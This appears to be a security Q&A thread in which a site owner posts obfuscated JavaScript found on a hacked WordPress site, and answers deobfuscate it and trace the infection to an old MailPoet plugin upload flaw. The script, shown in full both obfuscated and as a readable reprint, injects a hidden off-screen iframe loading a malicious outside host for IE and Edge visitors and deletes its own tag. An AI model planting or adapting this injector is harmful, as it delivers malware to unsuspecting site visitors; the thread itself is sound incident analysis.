    if(typeof window["v_bd66b32e1bc6ad91e01318e8278918f0"]=="undefined")
        {
        window["v_bd66b32e1bc6ad91e01318e8278918f0"]=1;
        var CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym=(JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo()&&iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX());
        var nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh=!CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym&&!!window.chrome&&window.navigator.vendor==="Google Inc.";
        var ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT=-1;
        var XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl="http://miwkavoriwka.ml/052F";
        if(LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()&&ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT==1)
            {
            if((navigator.userAgent.match(/iPhone/i))||(navigator.userAgent.match(/iPod/i)))
                {
                location.replace(XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl)
            }
            else
                {
                window.location=XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl;
                document.location=XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl
            }
        }
        else
            {


if((CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym&&!nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh&&!LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()))
                    {
                    var DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt="<div style=\"position:absolute;
                    left:-2630px;
                    \"><iframe width=\"21px\" src=\""+XfXhEPJoDqiyfeRjmbanzQnFJBmCNSefHcmzrl+"\" height=\"21px\"></iframe></div>";
                    var lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc=document.getElementsByTagName("div");
                    if(lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc.length==0)
                        {
                        document.body.innerHTML=document.body.innerHTML+DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt
                    }
                    else
                        {
                        var dl_name=lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc.length;
                        var mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy=Math.floor((dl_name/2));
                        lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML=lRaFfKMjehAqqYVjWLZYWayXQpFbgHLLUunc[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML+DesUquKQJgBZjosSHPWcRVgzymaWwrEImVixoHt
                    }
                }
            }
        }
        pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo()
    }
}
,100);
function pIooJuskHsSJnnXgfiVEvsFqqcqXQQjo()
    {
    var vgZvyjCdzDWwBudHEktBnaagYYYbnZxB="id_8807906";
    if(vgZvyjCdzDWwBudHEktBnaagYYYbnZxB!="none")
        {
        var ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD=document.getElementById(vgZvyjCdzDWwBudHEktBnaagYYYbnZxB);
        if(typeof ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD!=undefined&&ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD!=null)
            {
            ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD.outerHTML="";
            delete ZkGIDYCRWYyiJYOUJJcrnHHcKbhOZqNAkKJD
        }
    }
};
function iQDjSrUavDhsaZpAGAdpuicNIitAQcswtAX()
    {
    if(document.all&&!document.compatMode)
        {
        return true
    }
    else if(document.all&&!window.XMLHttpRequest)
        {
        return true
    }
    else if(document.all&&!document.querySelector)
        {
        return true
    }
    else if(document.all&&!document.addEventListener)
        {
        return true
    }
    else if(document.all&&!window.atob)
        {
        return true
    }
    else if(document.all)
        {
        return true
    }
    else if(typeof navigator.maxTouchPoints!="undefined"&&!document.all&&JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo())
        {
        return true
    }
    else
        {
        return false
    }
}
function JqFOWeGJVjglgXJgbmWMOOgrzOjmywAyo()
    {
    var zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY=window.navigator.userAgent;
    var TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("MSIE ");
    if(TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH>0)
        {
        return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH+5,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",TAbiLSYVvuNwIiiXwiIQnfLCxaBCrsouSxrSuH)),10)
    }
    var fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("Trident/");
    if(fvqjbsMLZwQhjFmZywfJpPJBvaYNNPAbkM>0)
        {
        var AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("rv:");
        return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA+3,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA)),10)
    }
    var REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF=zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf("Edge/");
    if(REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF>0)
        {
        return parseInt(zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.substring(REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF+5,zBnGcRKnUkgWeqGSsEApSnxtNiMXqfkGyY.indexOf(".",REVLGqfpuneuaaJEXHSGpWnQjZaZVSkF)),10)
    }
    return false
}
function LCHqSJXhIyudrWzobJDSCoYggFqaOJuRicOo()
    {
    var pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE=window.navigator.userAgent.toLowerCase();
    if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(pKJQtNwdoBZJNpjycIXWoUpkeifUIrZlE.substr(0,4)))
        {
        return true
    }
    return false
}
```

Which is still obfuscated a bit by using "random" variable name. Still you can see that the code is trying to redirect you to :

```
hxxp://miwkavoriwka.ml/052F
```

Anyone know what this site is for?

Comment: You can try view-source:url in a browser. I can't check it here.

Comment: Linked site is unreachable under Microsoft Edge or Firefox. Site has probably been taken down by the host.

Comment: It was supposed to be an intermediate redirect to the URL `ya.ru`. https://urlquery.net/report.php?id=1444837715798

Comment: Site does not respond.

Comment: "miwkavoriwka" is transliterated Russian meaning which means something like "a thieving mouse".

Comment: @Peteris I think it's rather "a thieving bear" (i meaning и, not ы). It even rhymes much better.

Comment: Safari (actually Google, I think) has it on its phishing blacklist.

Comment: @D-side, not it is very likely mouse - it sort of rhyming with "myshka-norushka" - it is a pharse from well known fairy tale.

Answer (score 17):

I deobfuscated the code a bit:

```
var interval = setInterval(function() {
    if (document.body != null && typeof document.body != "undefined") {
        clearInterval(interval);
        // only do once per page load
        if (typeof window["v_bd66b32e1bc6ad91e01318e8278918f0"] == "undefined") {
            window["v_bd66b32e1bc6ad91e01318e8278918f0"] = 1;
            // mobile ?
            var CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym = (test_for_sepcific_user_agents() && some_capability_check());
            // android ?
            var nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh = !CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym && !!window.chrome && window.navigator.vendor === "Google Inc.";
            var ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT = -1;
            var payload_addr = "http://miwkavoriwka.ml/052F";
            // This branch is never used because -1 != 1
            if (is_mobile_phone() && ZLuhoXzddcRRJFsZItJJdsiHYGGoAUT == 1) {
                if ((navigator.userAgent.match(/iPhone/i)) || (navigator.userAgent.match(/iPod/i))) {
                    location.replace(payload_addr)
                } else {
                    window.location = payload_addr;
                    document.location = payload_addr
                }
            } else {
                if ((CaEZrHZpZXgsQFUDwSZWraOlhbBrDoAwym && !nfxiKffyQjEHIifZBNIfZPyvuVAKXQAWejKxfkfeh && !is_mobile_phone())) {
                    var frame_div = "<div style=\"position:absolute;left:-2630px;\"><iframe width=\"21px\" src=\"" + payload_addr + "\" height=\"21px\"></iframe></div>";
                    var divs = document.getElementsByTagName("div");
                    if (divs.length == 0) {
                        document.body.innerHTML = document.body.innerHTML + frame_div
                    } else {
                        var dl_name = divs.length;
                        // why ?
                        var mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy = Math.floor((dl_name / 2));
                        divs[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML = divs[mJOsEiZbuQhiITsWpQZXGZaRzVlPtkSRFxLtfGy].innerHTML + frame_div
                    }
                }
            }
        }
        remove_script()
    }
}, 100);

function remove_script() {
    // Remove the script (myself)
    var some_id = "id_8807906";
    if (some_id != "none") {
        var some_element = document.getElementById(some_id);
        if (typeof some_element != undefined && some_element != null) {
            some_element.outerHTML = "";
            delete some_element
        }
    }
};

// some capability check
// POssible another mobile phone check ?
function some_capability_check() {
    if (document.all && !document.compatMode) {
        return true
    } else if (document.all && !window.XMLHttpRequest) {
        return true
    } else if (document.all && !document.querySelector) {
        return true
    } else if (document.all && !document.addEventListener) {
        return true
    } else if (document.all && !window.atob) {
        return true
    } else if (document.all) {
        return true
    } else if (typeof navigator.maxTouchPoints != "undefined" && !document.all && test_for_sepcific_user_agents()) {
        return true
    } else {
        return false
    }
}

function test_for_sepcific_user_agents() {
    var user_agent = window.navigator.userAgent;
    var user_agent_msi_index = user_agent.indexOf("MSIE ");
    if (user_agent_msi_index > 0) {
        return parseInt(user_agent.substring(user_agent_msi_index + 5, user_agent.indexOf(".", user_agent_msi_index)), 10)
    }
    var user_agent_trident_index = user_agent.indexOf("Trident/");
    if (user_agent_trident_index > 0) {
        var AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA = user_agent.indexOf("rv:");
        return parseInt(user_agent.substring(AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA + 3, user_agent.indexOf(".", AsjbhKOlLPkEJkiqgyAENlJgBuvvuDQA)), 10)
    }
    var user_agent_edge_index = user_agent.indexOf("Edge/");
    if (user_agent_edge_index > 0) {
        return parseInt(user_agent.substring(user_agent_edge_index + 5, user_agent.indexOf(".", user_agent_edge_index)), 10)
    }
    return false
}

function is_mobile_phone() {
    var user_agent = window.navigator.userAgent.toLowerCase();
    if (/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(user_agent) || /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(user_agent.substr(0, 4))) {
        return true
    }
    return false
}
```

It loads h**p://miwkavoriwka.ml/052F (which is already on some blacklists, inclusive FFs Phishing and Malware Protection list) in an iframe <s>or redirect to that url (depending on your browser)</s>

**edit:**
After reading the code a bit:
The only browser which seem to be targeted are the ones where this conditions are met:

- Useragents containing *MSIE*, *Trident/* or *Edge/*
- No mobile phone ? (see function *is_mobile_phone*)
- Some capability check true (see function *some_capability_check*)

Comment: I tried loading the site and it timeouted. Even when using some iphone User Agent.
My best guess is they start a scan on connection, or just have the script disabled now.

Answer (score 12):

Thanks for all of the great info and help!

I have since discovered how the site was originally hacked. The site was running an old version of the plugin Mailpoet / wysija-newsletters (pre 2.6.7)

Using an exploit in this plugin the attacker managed to upload malicious code which was then used to further infect the site.

https://blog.sucuri.net/2014/07/remote-file-upload-vulnerability-on-mailpoet-wysija-newsletters.html

Ultimately the security issue with Mailpoet / wysija-newsletters was used to upload a file called .zip to /wp-content/uploads/wysija/temp and then extract the zip and install some dodgy themes. The attached screenshot shows what happened when going into the plugins admin page after the zip had been deleted. It seems that whenever going into wp-admin the site would get reinfected.

The site has now been restored from a clean version, fully patched and the plugin WordFence is running.

[image]

Answer (score 6):

It's [apparent purpose](https://www.stopthehacker.com/2011/11/07/nl-ai-packed-malware/) is to infect `wp-settings.php`, so it infects all of your pages, and links malware through an iframe.

You can remove it by deleting `wp_inc/upd.php`, but this won't fix the threat vector unless that hole is plugged. However, the "main infection" itself may be located in a different file, if the comments are right. Again, removing this file will not help much if the threat vector is still there.

[One person](https://stackoverflow.com/questions/7765594/javascript-code-injected-into-site-can-you-help-me-decrypt-it) even suggested replacing `eval` with `alert`. Others have deobfuscated other versions already by using techniques described in [this thread](https://stackoverflow.com/questions/7765594/javascript-code-injected-into-site-can-you-help-me-decrypt-it). Your code follows a very similar pattern to that one.